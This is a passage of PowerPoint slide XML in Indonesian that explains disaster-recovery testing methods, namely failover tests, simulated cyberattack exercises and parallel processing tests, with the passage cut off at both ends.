              <a:t> TI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkolaborasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Failover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, uji failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sukses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksperimen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>realistis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemacetan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inefisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Paralel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
